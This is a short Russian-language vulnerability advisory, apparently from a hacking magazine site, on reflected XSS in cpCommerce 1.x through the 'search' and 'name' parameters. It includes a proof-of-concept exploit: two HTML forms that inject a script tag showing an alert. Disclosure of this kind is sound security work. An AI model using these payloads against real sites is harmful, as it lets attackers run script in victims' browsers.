Хакер #305. Многошаговые SQL-инъекции
Программа: cpCommerce 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "search" сценарием search.php и в параметре "name" сценарием
sendtofriend.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>
<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>